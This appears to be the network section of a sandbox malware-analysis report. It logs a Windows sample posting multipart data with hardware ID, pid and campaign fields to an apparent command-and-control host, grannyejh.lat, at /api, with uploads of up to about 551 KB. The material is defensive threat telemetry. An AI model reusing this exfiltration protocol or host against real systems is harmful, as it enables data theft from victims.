2024-12-18 20:17:12 UTC | 1369 | IN | Data Raw: 44 4e 53 64 4d 61 39 44 67 42 2b 36 67 6c 59 62 76 41 52 64 48 63 47 50 37 4f 75 62 4d 74 50 36 4b 68 70 70 45 35 6b 6c 66 31 69 63 74 48 77 46 58 68 5a 42 43 31 6f 69 49 75 36 4a 4a 4a 30 74 67 62 39 73 71 35 73 57 78 39 37 4b 47 37 32 47 6e 61 63 50 6d 43 77 30 58 59 47 76 38 75 44 50 43 68 4b 57 71 32 33 51 57 53 6d 42 50 69 68 75 72 35 51 6c 62 58 35 4a 2f 72 49 63 30 73 34 63 62 4d 53 4a 5a 4e 76 69 59 4b 2b 61 30 68 61 4c 6e 65 54 39 58 54 47 50 48 43 76 72 42 6f 64 2b 4f 6a 75 39 42 6c 33 6d 6a 2b 68 63 68 4c 32 52 72 32 61 6b 65 31 6f 6a 59 75 36 4a 4a 67 79 39 4d 61 2f 49 61 74 39 33 51 78 35 61 72 2b 69 53 48 65 61 2f 36 41 7a 6b 6a 58 45 2f 59 76 41 66 47 6b 4b 47 69 7a 33 55 48 5a 32 52 76 2b 79 72 79 7a 62 48 44 75 72 62 48 61 5a 4a 49 73 75
Data Ascii: DNSdMa9DgB+6glYbvARdHcGP7OubMtP6KhppE5klf1ictHwFXhZBC1oiIu6JJJ0tgb9sq5sWx97KG72GnacPmCw0XYGv8uDPChKWq23QWSmBPihur5QlbX5J/rIc0s4cbMSJZNviYK+a0haLneT9XTGPHCvrBod+Oju9Bl3mj+hchL2Rr2ake1ojYu6JJgy9Ma/Iat93Qx5ar+iSHea/6AzkjXE/YvAfGkKGiz3UHZ2Rv+yryzbHDurbHaZJIsu
2024-12-18 20:17:12 UTC | 1369 | IN | Data Raw: 51 46 50 73 67 42 66 4b 67 4a 57 47 38 6b 67 75 63 33 77 79 36 6e 76 4b 58 5a 6d 4c 31 70 62 44 61 64 38 6b 69 35 38 6a 53 42 4e 45 5a 76 6e 4a 4a 39 71 34 6c 61 72 44 65 52 64 6a 56 46 4f 6a 4a 74 62 35 6b 65 76 43 73 75 64 5a 71 32 6d 6e 33 67 4e 6c 49 32 41 66 37 4f 42 75 31 36 32 35 70 71 4a 49 64 6e 4f 34 54 36 74 61 78 2b 31 78 6e 34 62 43 31 33 47 32 53 66 62 61 66 69 30 50 61 56 61 5a 71 44 2f 71 73 4c 57 47 78 32 30 6e 52 33 52 33 2f 78 37 53 39 5a 33 76 69 6f 4c 6a 51 5a 4e 68 68 2b 59 7a 43 51 39 34 53 2f 54 68 4a 75 2b 55 70 64 76 43 4b 42 66 58 66 42 76 54 57 38 71 59 6a 61 4b 4b 68 73 70 45 35 6b 6d 62 79 69 63 39 44 32 68 50 37 4c 41 54 30 71 69 39 75 76 39 5a 4f 31 64 34 56 39 38 4f 2f 76 58 39 37 36 61 6d 79 32 47 33 66 49 72 62 47 7a 46
Data Ascii: QFPsgBfKgJWG8kguc3wy6nvKXZmL1pbDad8ki58jSBNEZvnJJ9q4larDeRdjVFOjJtb5kevCsudZq2mn3gNlI2Af7OBu1625pqJIdnO4T6tax+1xn4bC13G2Sfbafi0PaVaZqD/qsLWGx20nR3R3/x7S9Z3vioLjQZNhh+YzCQ94S/ThJu+UpdvCKBfXfBvTW8qYjaKKhspE5kmbyic9D2hP7LAT0qi9uv9ZO1d4V98O/vX976amy2G3fIrbGzF
2024-12-18 20:17:12 UTC | 1369 | IN | Data Raw: 4b 77 2f 6e 70 53 4e 6b 6f 74 68 4f 32 64 55 5a 39 38 57 30 76 32 5a 39 38 4b 2b 2b 30 6d 71 53 4c 4c 69 42 30 77 53 4f 56 64 30 39 48 2f 2b 69 49 6e 69 37 30 30 62 4b 31 51 53 36 69 50 4b 6f 61 6d 43 69 2f 71 6a 42 64 74 56 39 74 70 2b 4c 51 39 70 56 70 6d 6f 50 2f 4b 4d 70 61 4c 37 41 51 4e 72 58 47 2f 50 50 74 72 46 75 63 65 61 69 75 64 52 69 33 6d 6e 2f 68 63 52 41 33 78 76 33 4a 55 6d 37 35 53 6c 32 38 49 6f 46 2f 63 4d 58 39 73 76 79 70 69 4e 6f 6f 71 47 79 6b 54 6d 53 62 76 61 44 79 30 37 51 45 66 73 73 41 2f 43 6c 4a 57 32 2f 31 6b 50 59 31 78 54 78 7a 37 4f 2f 61 48 76 70 6f 4c 50 53 5a 39 51 69 74 73 62 4d 58 4a 5a 4e 76 67 6f 53 2b 4b 6b 70 4c 71 2b 63 58 4a 7a 66 47 4c 71 65 38 72 4a 68 64 65 57 6d 73 39 4a 70 31 32 62 79 67 38 74 4d 78 42 33
Data Ascii: Kw/npSNkothO2dUZ98W0v2Z98K++0mqSLLiB0wSOVd09H/+iIni700bK1QS6iPKoamCi/qjBdtV9tp+LQ9pVpmoP/KMpaL7AQNrXG/PPtrFuceaiudRi3mn/hcRA3xv3JUm75Sl28IoF/cMX9svypiNooqGykTmSbvaDy07QEfssA/ClJW2/1kPY1xTxz7O/aHvpoLPSZ9QitsbMXJZNvgoS+KkpLq+cXJzfGLqe8rJhdeWms9Jp12byg8tMxB3
2024-12-18 20:17:12 UTC | 1369 | IN | Data Raw: 2b 55 70 65 50 43 4b 42 65 4b 59 42 76 6e 57 73 62 5a 38 54 36 4c 2b 70 2b 38 68 32 58 54 2f 6c 73 68 53 33 52 6a 79 4f 7a 65 31 2f 58 6f 38 34 6f 41 58 6a 73 64 55 35 66 6e 38 2b 57 77 78 75 70 2b 6e 6b 58 65 53 4f 71 72 49 69 31 61 57 54 62 35 74 43 75 65 33 4b 47 32 6d 30 51 4c 69 35 6a 50 73 7a 4c 57 70 61 6d 62 74 35 76 43 52 62 70 49 36 77 63 62 43 51 38 30 45 36 43 63 5a 38 75 55 52 49 50 44 4b 42 59 53 59 49 66 6e 49 76 4c 35 37 59 4b 2b 42 71 4e 74 6d 77 6d 58 76 69 59 73 4b 6c 68 4f 2b 63 6c 71 37 35 53 70 2f 38 49 6f 56 6a 6f 4e 42 71 5a 48 69 36 33 49 2f 2b 2b 61 6f 6b 54 6d 41 4c 4c 69 55 69 78 79 57 55 76 30 34 47 2f 4f 6d 4f 47 33 33 37 48 76 37 77 68 6e 38 30 61 4f 48 55 33 62 34 71 37 6a 47 63 4a 35 33 2b 34 6a 46 51 38 42 56 73 47 6f 47
Data Ascii: +UpePCKBeKYBvnWsbZ8T6L+p+8h2XT/lshS3RjyOze1/Xo84oAXjsdU5fn8+Wwxup+nkXeSOqrIi1aWTb5tCue3KG2m0QLi5jPszLWpambt5vCRbpI6wcbCQ80E6CcZ8uURIPDKBYSYIfnIvL57YK+BqNtmwmXviYsKlhO+clq75Sp/8IoVjoNBqZHi63I/++aokTmALLiUixyWUv04G/OmOG337Hv7whn80aOHU3b4q7jGcJ53+4jFQ8BVsGoG
2024-12-18 20:17:12 UTC | 1369 | IN | Data Raw: 44 77 31 6c 53 63 67 45 53 6f 6e 65 66 71 4f 69 47 77 75 66 44 49 49 63 51 69 6f 4e 53 46 42 4d 52 56 70 6d 70 4f 39 72 63 38 61 4c 50 45 52 70 76 6d 4b 74 33 49 74 62 68 37 59 66 57 70 67 4f 39 30 30 57 7a 32 67 64 31 56 6c 6c 75 2b 4a 55 6d 74 6e 47 34 6d 38 4f 30 4c 6e 4d 42 55 6f 6f 61 48 75 6d 4e 2f 35 62 43 76 6e 45 62 63 5a 66 6d 51 32 31 50 5a 56 62 42 71 44 37 58 39 66 43 44 77 31 6c 53 63 67 45 53 6f 6e 65 66 71 4f 69 47 77 75 66 44 49 49 63 51 69 6f 4e 53 46 42 4d 52 56 70 6d 70 4f 39 72 63 38 61 4c 50 45 52 70 76 6d 4b 74 33 49 74 62 68 37 59 66 57 70 38 66 39 58 38 31 7a 47 6b 38 68 4b 32 42 4c 6f 4f 30 6d 37 35 53 45 75 36 4f 73 46 6c 4a 67 72 74 49 61 71 2b 54 55 78 31 36 57 77 33 32 62 45 63 37 57 68 78 55 50 58 41 2b 34 39 42 72 71 4c 47
Data Ascii: Dw1lScgESonefqOiGwufDIIcQioNSFBMRVpmpO9rc8aLPERpvmKt3Itbh7YfWpgO900Wz2gd1Vllu+JUmtnG4m8O0LnMBUooaHumN/5bCvnEbcZfmQ21PZVbBqD7X9fCDw1lScgESonefqOiGwufDIIcQioNSFBMRVpmpO9rc8aLPERpvmKt3Itbh7YfWp8f9X81zGk8hK2BLoO0m75SEu6OsFlJgrtIaq+TUx16Ww32bEc7WhxUPXA+49BrqLG
2024-12-18 20:17:12 UTC | 1369 | IN | Data Raw: 42 79 73 30 58 36 73 47 4d 68 30 42 6a 35 62 61 39 6b 31 44 45 59 66 69 49 7a 41 53 59 56 65 5a 71 55 62 57 49 50 47 6d 67 30 51 57 53 6d 42 69 36 6e 76 4b 30 66 33 62 79 70 66 4c 57 65 39 55 69 35 38 6a 53 42 4d 42 56 70 6e 6c 48 74 62 64 75 4e 76 43 56 53 39 48 5a 46 2f 54 46 6f 4b 74 72 63 76 53 6c 2b 65 39 66 2f 33 44 2f 6c 73 67 47 35 78 6a 36 50 42 7a 32 74 53 6c 51 6a 76 39 58 32 38 67 58 75 4f 71 31 74 47 46 50 33 4a 47 76 31 6e 47 51 52 50 75 51 79 41 53 59 56 65 5a 71 55 62 57 49 50 47 6d 67 30 51 66 77 33 78 6e 32 68 71 33 33 64 44 48 30 35 75 61 43 4c 35 4a 77 75 4e 36 4c 41 39 55 48 37 43 77 4b 34 36 5a 70 55 49 37 2f 56 39 76 49 46 37 6a 33 76 37 31 37 5a 4f 47 32 75 65 39 66 2f 33 44 2f 6c 73 67 47 38 79 2b 38 47 78 2f 32 70 53 42 70 38 4a
Data Ascii: Bys0X6sGMh0Bj5ba9k1DEYfiIzASYVeZqUbWIPGmg0QWSmBi6nvK0f3bypfLWe9Ui58jSBMBVpnlHtbduNvCVS9HZF/TFoKtrcvSl+e9f/3D/lsgG5xj6PBz2tSlQjv9X28gXuOq1tGFP3JGv1nGQRPuQyASYVeZqUbWIPGmg0Qfw3xn2hq33dDH05uaCL5JwuN6LA9UH7CwK46ZpUI7/V9vIF7j3v717ZOG2ue9f/3D/lsgG8y+8Gx/2pSBp8J


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49723 | 172.67.179.109 | 443 | 7392 | C:\Users\user\Desktop\pPizCGDvrx.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:17:14 UTC | 280 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=QIX7HBIA1S9Y5Q48LYY
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12850
Host: grannyejh.lat
2024-12-18 20:17:14 UTC | 12850 | OUT | Data Raw: 2d 2d 51 49 58 37 48 42 49 41 31 53 39 59 35 51 34 38 4c 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 34 30 34 41 37 36 30 30 46 36 44 30 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 51 49 58 37 48 42 49 41 31 53 39 59 35 51 34 38 4c 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 49 58 37 48 42 49 41 31 53 39 59 35 51 34 38 4c 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
Data Ascii: --QIX7HBIA1S9Y5Q48LYYContent-Disposition: form-data; name="hwid"33404A7600F6D0ACAC8923850305D13E--QIX7HBIA1S9Y5Q48LYYContent-Disposition: form-data; name="pid"2--QIX7HBIA1S9Y5Q48LYYContent-Disposition: form-data; name="lid"PsFKDg--pa
2024-12-18 20:17:17 UTC | 1035 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 20:17:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=h6v1kmo0k4p280bicrid0d1998; expires=Sun, 13-Apr-2025 14:03:54 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aLpIAJeqHNSLgSykLf9VMwzsPj%2Fmx5%2FiaqVZEzzfFJeyzOHeB48%2FfSDHK0pF94YV4QYTmQPLozLe0yXH1mv4KJfjw%2BWvynUxsQqs7151zkkxqbZisoz4kX6qfqiyyMZI"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f41d5d24fc0433a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1762&min_rtt=1741&rtt_var=668&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2830&recv_bytes=13788&delivery_rate=1677197&cwnd=242&unsent_bytes=0&cid=0fe9af7194ea3787&ts=3207&x=0"
2024-12-18 20:17:17 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-18 20:17:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.749735172.67.179.1094437392C:\Users\user\Desktop\pPizCGDvrx.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-18 20:17:19 UTC272OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=XGGIGRETO6J
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 15034
                                                                                                            Host: grannyejh.lat
                                                                                                            2024-12-18 20:17:19 UTC15034OUTData Raw: 2d 2d 58 47 47 49 47 52 45 54 4f 36 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 34 30 34 41 37 36 30 30 46 36 44 30 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 58 47 47 49 47 52 45 54 4f 36 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 47 47 49 47 52 45 54 4f 36 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 58 47 47 49 47 52 45 54 4f 36 4a 0d 0a 43 6f 6e 74
                                                                                                            Data Ascii: --XGGIGRETO6JContent-Disposition: form-data; name="hwid"33404A7600F6D0ACAC8923850305D13E--XGGIGRETO6JContent-Disposition: form-data; name="pid"2--XGGIGRETO6JContent-Disposition: form-data; name="lid"PsFKDg--pablo--XGGIGRETO6JCont
                                                                                                            2024-12-18 20:17:23 UTC | 1031 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Wed, 18 Dec 2024 20:17:23 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=1d2h5h2hfgfveajcie3n8ftuvd; expires=Sun, 13-Apr-2025 14:03:59 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BToEVgXlKWSufTTxgSWhu81I%2FeLx%2F6FnbmSuKwBmI1IBhPqLD3QJHJCpVqWSBZ5H9dvj0UfjhRey4WTsVUPBW5DEfTJPtYEizy8p4hQWyd7KGa5qdXlLskS9uznipFSe"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f41d5f11aaec32c-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1717&min_rtt=1710&rtt_var=656&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2831&recv_bytes=15964&delivery_rate=1648785&cwnd=171&unsent_bytes=0&cid=59ae42e73ffec287&ts=4596&x=0"
                                                                                                            2024-12-18 20:17:23 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                            Data Ascii: f\r\nok 8.46.123.189\r\n
                                                                                                            2024-12-18 20:17:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0\r\n\r\n


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            4 | 192.168.2.7 | 49754 | 172.67.179.109 | 443 | 7392 | C:\Users\user\Desktop\pPizCGDvrx.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            2024-12-18 20:17:25 UTC | 274 | OUT | POST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=0PD9BVQSDHL2J
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 20371
                                                                                                            Host: grannyejh.lat
                                                                                                            2024-12-18 20:17:25 UTC15331OUTData Raw: 2d 2d 30 50 44 39 42 56 51 53 44 48 4c 32 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 34 30 34 41 37 36 30 30 46 36 44 30 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 50 44 39 42 56 51 53 44 48 4c 32 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 50 44 39 42 56 51 53 44 48 4c 32 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 30 50 44 39 42 56 51 53 44 48 4c
                                                                                                            Data Ascii: --0PD9BVQSDHL2JContent-Disposition: form-data; name="hwid"33404A7600F6D0ACAC8923850305D13E--0PD9BVQSDHL2JContent-Disposition: form-data; name="pid"3--0PD9BVQSDHL2JContent-Disposition: form-data; name="lid"PsFKDg--pablo--0PD9BVQSDHL
                                                                                                            2024-12-18 20:17:25 UTC5040OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
                                                                                                            2024-12-18 20:17:29 UTC | 1037 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Wed, 18 Dec 2024 20:17:29 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=h3t50kuakhcvf39vfvr7v0thch; expires=Sun, 13-Apr-2025 14:04:06 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zv1ttGBnN4Mc5%2F0GjL%2BLzGBzkEEAE63j3ibPKufRS3IHB4oHxq2M3W2d5l2TVDbJH%2BdxqBm7QqRu2OXenBROfGdRwgvCT%2BvtnQyVX0PZ3mXcSQCe0qB0sNec%2BP5nxoRx"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f41d616f84643c3-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1868&min_rtt=1723&rtt_var=937&sent=15&recv=24&lost=0&retrans=0&sent_bytes=2829&recv_bytes=21325&delivery_rate=1010730&cwnd=211&unsent_bytes=0&cid=d195f03e6bb15e4e&ts=3934&x=0"
                                                                                                            2024-12-18 20:17:29 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                            Data Ascii: f\r\nok 8.46.123.189\r\n
                                                                                                            2024-12-18 20:17:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0\r\n\r\n


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            5 | 192.168.2.7 | 49765 | 172.67.179.109 | 443 | 7392 | C:\Users\user\Desktop\pPizCGDvrx.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            2024-12-18 20:17:30 UTC | 273 | OUT | POST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=2ODPF2AH7FW6G
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 1206
                                                                                                            Host: grannyejh.lat
                                                                                                            2024-12-18 20:17:30 UTC1206OUTData Raw: 2d 2d 32 4f 44 50 46 32 41 48 37 46 57 36 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 34 30 34 41 37 36 30 30 46 36 44 30 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 32 4f 44 50 46 32 41 48 37 46 57 36 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 4f 44 50 46 32 41 48 37 46 57 36 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 32 4f 44 50 46 32 41 48 37 46 57
                                                                                                            Data Ascii: --2ODPF2AH7FW6GContent-Disposition: form-data; name="hwid"33404A7600F6D0ACAC8923850305D13E--2ODPF2AH7FW6GContent-Disposition: form-data; name="pid"1--2ODPF2AH7FW6GContent-Disposition: form-data; name="lid"PsFKDg--pablo--2ODPF2AH7FW
                                                                                                            2024-12-18 20:17:34 UTC | 1028 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Wed, 18 Dec 2024 20:17:34 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=o26i80s3vt7e756rro7rvgkoee; expires=Sun, 13-Apr-2025 14:04:12 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xd68%2BmfWOxGmFOIHDMtGWkFn5oayPceVDj0Qd690Z8yxY7bVZQCl1feIYHEQ%2F8A53mZlplPKEgSXYMkozrTwet3cf5TyJQgyjHreFtdD6mCoDz9gZvwDXbUDgm6hxAc1"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f41d639189f42d4-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1655&rtt_var=629&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2829&recv_bytes=2115&delivery_rate=1727810&cwnd=247&unsent_bytes=0&cid=758f63e6dc5d66cb&ts=3839&x=0"
                                                                                                            2024-12-18 20:17:34 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                            Data Ascii: f\r\nok 8.46.123.189\r\n
                                                                                                            2024-12-18 20:17:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0\r\n\r\n


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            6 | 192.168.2.7 | 49781 | 172.67.179.109 | 443 | 7392 | C:\Users\user\Desktop\pPizCGDvrx.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            2024-12-18 20:17:36 UTC | 272 | OUT | POST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=BHT4KAL6C4
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 551069
                                                                                                            Host: grannyejh.lat
